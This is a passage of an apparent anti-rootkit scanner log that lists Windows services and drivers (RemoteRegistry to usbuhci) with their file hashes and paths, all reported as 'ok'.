15:33:45.0409 0x04bc  [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
15:33:45.0445 0x04bc  RemoteRegistry - ok
15:33:45.0495 0x04bc  [ 3DD798846E2C28102B922C56E71B7932, 30B111615D74CB2213997A5C08DD9C8613ADE441D9423CC1C49A753D13CE524D ] RFCOMM          C:\Windows\system32\DRIVERS\rfcomm.sys
15:33:45.0518 0x04bc  RFCOMM - ok
15:33:45.0530 0x04bc  [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
15:33:45.0564 0x04bc  RpcEptMapper - ok
15:33:45.0579 0x04bc  [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator      C:\Windows\system32\locator.exe
15:33:45.0598 0x04bc  RpcLocator - ok
15:33:45.0632 0x04bc  [ F3EF088F45BE326B4EDAC8C1C5A35105, 6A8F992981AB68F811E3EF51545A0B0572A88C746472D24042646329B581F519 ] RpcSs           C:\Windows\system32\rpcss.dll
15:33:45.0649 0x04bc  RpcSs - ok
15:33:45.0665 0x04bc  [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
15:33:45.0697 0x04bc  rspndr - ok
15:33:45.0709 0x04bc  [ E60C0A09F997826C7627B244195AB581, E8630ED74B38B98BF584E353D992C1311BC36AB7F20A1BB66C9CD65CE1E46F8D ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
15:33:45.0731 0x04bc  s3cap - ok
15:33:45.0742 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs           C:\Windows\system32\lsass.exe
15:33:45.0750 0x04bc  SamSs - ok
15:33:45.0768 0x04bc  [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
15:33:45.0777 0x04bc  sbp2port - ok
15:33:45.0802 0x04bc  [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
15:33:45.0826 0x04bc  SCardSvr - ok
15:33:45.0833 0x04bc  [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
15:33:45.0866 0x04bc  scfilter - ok
15:33:45.0901 0x04bc  [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule        C:\Windows\system32\schedsvc.dll
15:33:45.0952 0x04bc  Schedule - ok
15:33:45.0977 0x04bc  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc     C:\Windows\System32\certprop.dll
15:33:45.0998 0x04bc  SCPolicySvc - ok
15:33:46.0036 0x04bc  [ 111E0EBC0AD79CB0FA014B907B231CF0, B7D43D156C2524938503CF8E99C4D1F7A5C55E16C0368F57F4CD23C6D833B38F ] sdbus           C:\Windows\system32\DRIVERS\sdbus.sys
15:33:46.0064 0x04bc  sdbus - ok
15:33:46.0076 0x04bc  [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
15:33:46.0108 0x04bc  SDRSVC - ok
15:33:46.0125 0x04bc  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\Windows\system32\drivers\secdrv.sys
15:33:46.0155 0x04bc  secdrv - ok
15:33:46.0168 0x04bc  [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon        C:\Windows\system32\seclogon.dll
15:33:46.0190 0x04bc  seclogon - ok
15:33:46.0214 0x04bc  [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS            C:\Windows\System32\sens.dll
15:33:46.0250 0x04bc  SENS - ok
15:33:46.0261 0x04bc  [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc        C:\Windows\system32\sensrsvc.dll
15:33:46.0286 0x04bc  SensrSvc - ok
15:33:46.0447 0x04bc  [ 35ED5CA876DA81CFD607A027D7A0F925, C5C584538FE5ED61C1E17F932F0BAEDD7CAAF75EEFABBD8CAC46986E65C42956 ] SepMasterService C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
15:33:46.0455 0x04bc  SepMasterService - ok
15:33:46.0488 0x04bc  [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum         C:\Windows\system32\DRIVERS\serenum.sys
15:33:46.0510 0x04bc  Serenum - ok
15:33:46.0528 0x04bc  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial          C:\Windows\system32\DRIVERS\serial.sys
15:33:46.0551 0x04bc  Serial - ok
15:33:46.0567 0x04bc  [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse        C:\Windows\system32\drivers\sermouse.sys
15:33:46.0587 0x04bc  sermouse - ok
15:33:46.0606 0x04bc  [ F8F5016A8021390DFAF8782687B4F226, BF51874E3448F2800DCC74BDDCFD86D55C95B4B076DFAE61DD821A440BB0405E ] SessionEnv      C:\Windows\system32\sessenv.dll
15:33:46.0623 0x04bc  SessionEnv - ok
15:33:46.0625 0x04bc  [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
15:33:46.0639 0x04bc  sffdisk - ok
15:33:46.0642 0x04bc  [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
15:33:46.0652 0x04bc  sffp_mmc - ok
15:33:46.0654 0x04bc  [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
15:33:46.0663 0x04bc  sffp_sd - ok
15:33:46.0665 0x04bc  [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
15:33:46.0674 0x04bc  sfloppy - ok
15:33:46.0699 0x04bc  [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess    C:\Windows\System32\ipnathlp.dll
15:33:46.0733 0x04bc  SharedAccess - ok
15:33:46.0761 0x04bc  [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
15:33:46.0796 0x04bc  ShellHWDetection - ok
15:33:46.0799 0x04bc  [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
15:33:46.0806 0x04bc  SiSRaid2 - ok
15:33:46.0817 0x04bc  [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
15:33:46.0826 0x04bc  SiSRaid4 - ok
15:33:46.0843 0x04bc  [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
15:33:46.0874 0x04bc  Smb - ok
15:33:46.0986 0x04bc  [ 08BA8CFC9D1DD09BDC61E539526BD7D6, 4BB67B8833D482D88C5A1E502A4DD40C404C84F97B4F964EDFD6DEA00BFB11DD ] SmcService      C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
15:33:47.0027 0x04bc  SmcService - ok
15:33:47.0063 0x04bc  [ 69DC59C1B15B02632F74E8DEBFBB4D02, 015FC9276D0089EFAB7B26B1E44C2A36AA7C4762FCCD9D13050A4680167B048B ] SNAC            C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
15:33:47.0077 0x04bc  SNAC - ok
15:33:47.0107 0x04bc  [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
15:33:47.0126 0x04bc  SNMPTRAP - ok
15:33:47.0146 0x04bc  [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr           C:\Windows\system32\drivers\spldr.sys
15:33:47.0154 0x04bc  spldr - ok
15:33:47.0177 0x04bc  [ B98780FA7839BB6B14823C56A7BDA35C, 7EF79A807DE9940A93BDE9E18CD83940773BCA26CA68646C76BC2F96B6DC2E5B ] Spooler         C:\Windows\System32\spoolsv.exe
15:33:47.0221 0x04bc  Spooler - ok
15:33:47.0320 0x04bc  [ 2A0DA1B8F48E7F3C9337E5463CEABB8D, 581C95B02DFD1300875ED2F61E65A682CABD1375251C10254F744E5D5A1A8B08 ] sppsvc          C:\Windows\system32\sppsvc.exe
15:33:47.0406 0x04bc  sppsvc - ok
15:33:47.0438 0x04bc  [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify     C:\Windows\system32\sppuinotify.dll
15:33:47.0461 0x04bc  sppuinotify - ok
15:33:47.0530 0x04bc  [ DB963A41F5BEED627CCC88DBA05D18EE, 2E52734F35BA47D467B0E64F97E1A87D2756A03C70B485756C3D16C43C2E5A75 ] SRTSP           C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS
15:33:47.0549 0x04bc  SRTSP - ok
15:33:47.0557 0x04bc  [ B18CE01B9C09C59422BA7C7064248B35, B355EE2FBB37C4B0EFFE4DC5E0788A26579266828E7988EDC497B0AE7375F8AB ] SRTSPX          C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS
15:33:47.0564 0x04bc  SRTSPX - ok
15:33:47.0590 0x04bc  [ 20735E269DF367C76EF02DDE9C3FA477, 0D794D191A74406CCD62DCC270F9350981EE935488C61ADF168E98A712EE42B6 ] srv             C:\Windows\system32\DRIVERS\srv.sys
15:33:47.0618 0x04bc  srv - ok
15:33:47.0635 0x04bc  [ 6D1173EDC0D5C02ACE4BEA18F48E0746, BCDF818C079B3E90577AEEE7ECDA4DA2E54F0F393F5FFD26FD0D4793CE14038F ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
15:33:47.0659 0x04bc  srv2 - ok
15:33:47.0695 0x04bc  [ 0C4540311E11664B245A263E1154CEF8, 63376322BFFAFF2F166AF3FDD3F1A346C21FAE21F406F659F8630779D1D6525D ] SrvHsfHDA       C:\Windows\system32\DRIVERS\VSTAZL6.SYS
15:33:47.0709 0x04bc  SrvHsfHDA - ok
15:33:47.0742 0x04bc  [ 02071D207A9858FBE3A48CBFD59C4A04, FEA4DEBAEC3465E0C7C1E8B721805922F6BBCB96A60A193B11688F4252F4B89E ] SrvHsfV92       C:\Windows\system32\DRIVERS\VSTDPV6.SYS
15:33:47.0800 0x04bc  SrvHsfV92 - ok
15:33:47.0831 0x04bc  [ 18E40C245DBFAF36FD0134A7EF2DF396, 0138A68958112101A5D3BD94114F320CE80B0C9A93E009AC78DE7415FCCC7DE7 ] SrvHsfWinac     C:\Windows\system32\DRIVERS\VSTCNXT6.SYS
15:33:47.0853 0x04bc  SrvHsfWinac - ok
15:33:47.0886 0x04bc  [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
15:33:47.0907 0x04bc  srvnet - ok
15:33:47.0939 0x04bc  [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
15:33:47.0978 0x04bc  SSDPSRV - ok
15:33:48.0003 0x04bc  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc         C:\Windows\system32\sstpsvc.dll
15:33:48.0026 0x04bc  SstpSvc - ok
15:33:48.0037 0x04bc  [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor        C:\Windows\system32\drivers\stexstor.sys
15:33:48.0045 0x04bc  stexstor - ok
15:33:48.0081 0x04bc  [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc          C:\Windows\System32\wiaservc.dll
15:33:48.0102 0x04bc  stisvc - ok
15:33:48.0109 0x04bc  [ 7785DC213270D2FC066538DAF94087E7, F09CB2895241719CA5147B2EE9F7ECBD0303AFFB5CD896F06D4D29BAAAFC207B ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
15:33:48.0117 0x04bc  storflt - ok
15:33:48.0125 0x04bc  [ C40841817EF57D491F22EB103DA587CC, 5FAA2DE43BADC16A898C0C290C44C41E4411D919A95FE8C6FF45EA7A34495079 ] StorSvc         C:\Windows\system32\storsvc.dll
15:33:48.0157 0x04bc  StorSvc - ok
15:33:48.0160 0x04bc  [ D34E4943D5AC096C8EDEEBFD80D76E23, 1DD7F6F97060B5F763A04ACA1F75E59DAB09EF824FD09B83FC3C192837D006DE ] storvsc         C:\Windows\system32\drivers\storvsc.sys
15:33:48.0167 0x04bc  storvsc - ok
15:33:48.0174 0x04bc  [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
15:33:48.0181 0x04bc  swenum - ok
15:33:48.0197 0x04bc  [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv           C:\Windows\System32\swprv.dll
15:33:48.0227 0x04bc  swprv - ok
15:33:48.0265 0x04bc  [ 45201A8FDE8DCF8E7F4D15DF3E524B79, B48B8DCDDF377BB7DCE255410FE36B74EA12E239D1725A9DBDEA9A672B484B15 ] SyDvCtrl        C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys
15:33:48.0273 0x04bc  SyDvCtrl - ok
15:33:48.0291 0x04bc  [ 5C9EE2303CA7F267665D75237862B39C, 5DECD977A823C14B4D980D3DB621BC875231B741653F0450A027FC9E87725F9D ] SymDS           C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS
15:33:48.0305 0x04bc  SymDS - ok
15:33:48.0337 0x04bc  [ 9F31630D7FC2DD9D5DA1CE359AAD1F46, 296D29EDF53956D1899DE4669AB429C280DF9F183F00AE1CE528E7C575802235 ] SymEFA          C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS
15:33:48.0371 0x04bc  SymEFA - ok
15:33:48.0389 0x04bc  [ 97E11C50CE52277B377396EA8838E539, E17D03F80E14F961C41F2D54D1EF73D29BF01F38459C5710D786234F8BA3C835 ] SymEvent        C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
15:33:48.0398 0x04bc  SymEvent - ok
15:33:48.0436 0x04bc  [ 7C30E8FB9076ED600C1EFD0FBBBE22C7, D91630238D0588D73147F3E98353341AB5E0BFB92BB4AABB6AC5499AFD5A48E9 ] SymIRON         C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS
15:33:48.0445 0x04bc  SymIRON - ok
15:33:48.0466 0x04bc  [ 191264EBF602F02ECE77B18D68046CF7, ABB05486E690C1C86D715972CAEDAAED9EEEEC09E47FEFA107C0B808FBDFD117 ] SYMNETS         C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS
15:33:48.0478 0x04bc  SYMNETS - ok
15:33:48.0527 0x04bc  [ 25E0900D1B452EDEB09B1F9B71195153, 96F47A96AA3510EBC67579806A679D82CF85709A1E041D026378E8F6DC0EB374 ] SysMain         C:\Windows\system32\sysmain.dll
15:33:48.0569 0x04bc  SysMain - ok
15:33:48.0606 0x04bc  [ 5C4FD41D8017801B11F212B27AC72D16, F8FB8A64A2FF27F9E2608ACB149675666CFB4EAC8C3582568B44931C3AE9635C ] SysPlant        C:\Windows\system32\Drivers\SysPlant.sys
15:33:48.0614 0x04bc  SysPlant - ok
15:33:48.0633 0x04bc  [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
15:33:48.0660 0x04bc  TabletInputService - ok
15:33:48.0690 0x04bc  [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv         C:\Windows\System32\tapisrv.dll
15:33:48.0731 0x04bc  TapiSrv - ok
15:33:48.0746 0x04bc  [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS             C:\Windows\System32\tbssvc.dll
15:33:48.0768 0x04bc  TBS - ok
15:33:48.0825 0x04bc  [ 4F80944B03112F486212DC20BE166079, B4C1AF42E450A280C8018EF123555F4E3FD943BDC14E4ECD0AB72BB40C22AF94 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
15:33:48.0878 0x04bc  Tcpip - ok
15:33:48.0933 0x04bc  [ 4F80944B03112F486212DC20BE166079, B4C1AF42E450A280C8018EF123555F4E3FD943BDC14E4ECD0AB72BB40C22AF94 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
15:33:48.0968 0x04bc  TCPIP6 - ok
15:33:48.0985 0x04bc  [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
15:33:48.0992 0x04bc  tcpipreg - ok
15:33:49.0009 0x04bc  [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
15:33:49.0044 0x04bc  TDPIPE - ok
15:33:49.0057 0x04bc  [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
15:33:49.0079 0x04bc  TDTCP - ok
15:33:49.0097 0x04bc  [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
15:33:49.0119 0x04bc  tdx - ok
15:33:49.0158 0x04bc  [ 316F40535360C97A0419F8A8AE4A9A80, CB9F0BAD3B321C27E934BE4AE8065A36701276435F03212350BAF6FD55989858 ] Teefer2         C:\Windows\system32\DRIVERS\Teefer.sys
15:33:49.0166 0x04bc  Teefer2 - ok
15:33:49.0189 0x04bc  [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
15:33:49.0197 0x04bc  TermDD - ok
15:33:49.0236 0x04bc  [ 2E648163254233755035B46DD7B89123, 6FA0D07CE18A3A69D82EE49D875F141E39406E92C34EAC76AC4EB052E6EBCBCD ] TermService     C:\Windows\System32\termsrv.dll
15:33:49.0267 0x04bc  TermService - ok
15:33:49.0288 0x04bc  [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes          C:\Windows\system32\themeservice.dll
15:33:49.0299 0x04bc  Themes - ok
15:33:49.0315 0x04bc  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER     C:\Windows\system32\mmcss.dll
15:33:49.0336 0x04bc  THREADORDER - ok
15:33:49.0353 0x04bc  [ DBCC20C02E8A3E43B03C304A4E40A84F, BF5F3ACCB0342304A6870E94D2576644B08DBF307C853C7DBA4B82B0C7309DA4 ] TPM             C:\Windows\system32\drivers\tpm.sys
15:33:49.0371 0x04bc  TPM - ok
15:33:49.0388 0x04bc  [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks          C:\Windows\System32\trkwks.dll
15:33:49.0425 0x04bc  TrkWks - ok
15:33:49.0492 0x04bc  [ 975F2CAA23B9CF4420EAB6439BE4D233, D2E37D96D1C90F3B1D5CE21E6516B88E98199F86EE56CDAF3E2673FFE154E452 ] TrueSight       C:\Windows\System32\drivers\TrueSight.sys
15:33:49.0500 0x04bc  TrueSight - ok
15:33:49.0548 0x04bc  [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
15:33:49.0571 0x04bc  TrustedInstaller - ok
15:33:49.0578 0x04bc  [ 4CE278FC9671BA81A138D70823FCAA09, CBE501436696E32A3701B9F377B823AC36647B6626595F76CC63E2396AD7D300 ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
15:33:49.0608 0x04bc  tssecsrv - ok
15:33:49.0633 0x04bc  [ D11C783E3EF9A3C52C0EBE83CC5000E9, A136C355D4C8945729163D15801364A614E23217B15F9313C85BA45BB71A74EB ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
15:33:49.0657 0x04bc  TsUsbFlt - ok
15:33:49.0664 0x04bc  [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD         C:\Windows\system32\drivers\TsUsbGD.sys
15:33:49.0678 0x04bc  TsUsbGD - ok
15:33:49.0703 0x04bc  [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
15:33:49.0735 0x04bc  tunnel - ok
15:33:49.0738 0x04bc  [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35          C:\Windows\system32\drivers\uagp35.sys
15:33:49.0746 0x04bc  uagp35 - ok
15:33:49.0762 0x04bc  [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
15:33:49.0802 0x04bc  udfs - ok
15:33:49.0819 0x04bc  [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect       C:\Windows\system32\UI0Detect.exe
15:33:49.0829 0x04bc  UI0Detect - ok
15:33:49.0841 0x04bc  [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
15:33:49.0849 0x04bc  uliagpkx - ok
15:33:49.0862 0x04bc  [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
15:33:49.0884 0x04bc  umbus - ok
15:33:49.0894 0x04bc  [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass          C:\Windows\system32\drivers\umpass.sys
15:33:49.0912 0x04bc  UmPass - ok
15:33:49.0935 0x04bc  [ BEBC13D55C302339B9350D9FF9EEFCB5, E8513D2D23D7F134BB4E3BFC85F87B802F4F2E411CCF33306023E5F8D54C5CFF ] UmRdpService    C:\Windows\System32\umrdp.dll
15:33:49.0958 0x04bc  UmRdpService - ok
15:33:50.0006 0x04bc  [ C485FB802F6C4A306B8F89BA087E5CA2, DE2E0F4A22D63EC54E23491962282ED3B01C7EB9941774A0C5633A776EAD499A ] UNS             C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
15:33:50.0017 0x04bc  UNS - ok
15:33:50.0048 0x04bc  [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost        C:\Windows\System32\upnphost.dll
15:33:50.0087 0x04bc  upnphost - ok
15:33:50.0113 0x04bc  [ 5C3BE22E485B9BF11FCEFDC676C728D0, F55061066ECF6920D56518A677BB538C18B7F1BB150ED6DB3591408F44E8D53A ] USBAAPL64       C:\Windows\system32\Drivers\usbaapl64.sys
15:33:50.0142 0x04bc  USBAAPL64 - ok
15:33:50.0176 0x04bc  [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
15:33:50.0206 0x04bc  usbccgp - ok
15:33:50.0243 0x04bc  [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir          C:\Windows\system32\drivers\usbcir.sys
15:33:50.0265 0x04bc  usbcir - ok
15:33:50.0314 0x04bc  [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] usbehci         C:\Windows\system32\drivers\usbehci.sys
15:33:50.0335 0x04bc  usbehci - ok
15:33:50.0388 0x04bc  [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
15:33:50.0410 0x04bc  usbhub - ok
15:33:50.0437 0x04bc  [ 765A92D428A8DB88B960DA5A8D6089DC, 56DE8A2ED58E53B202C399CA7BACB1551136303C2EE0AB426BDBBF880E3C542C ] usbohci         C:\Windows\system32\drivers\usbohci.sys
15:33:50.0454 0x04bc  usbohci - ok
15:33:50.0483 0x04bc  [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint        C:\Windows\system32\drivers\usbprint.sys
15:33:50.0506 0x04bc  usbprint - ok
15:33:50.0526 0x04bc  [ ED08C252A0041F8FC0237BAB585BABDC, DF5948BCD5CEB5B69E1A0096465C069E233DB81F5524D7364FF3FCD1E5B28880 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
15:33:50.0544 0x04bc  USBSTOR - ok
15:33:50.0551 0x04bc  [ DD253AFC3BC6CBA412342DE60C3647F3, 146F8613F1057AC054DC3593E84BC52899DA27EA33B0E72ACFB78C3699ADCDE7 ] usbuhci         C:\Windows\system32\drivers\usbuhci.sys
15:33:50.0574 0x04bc  usbuhci - ok
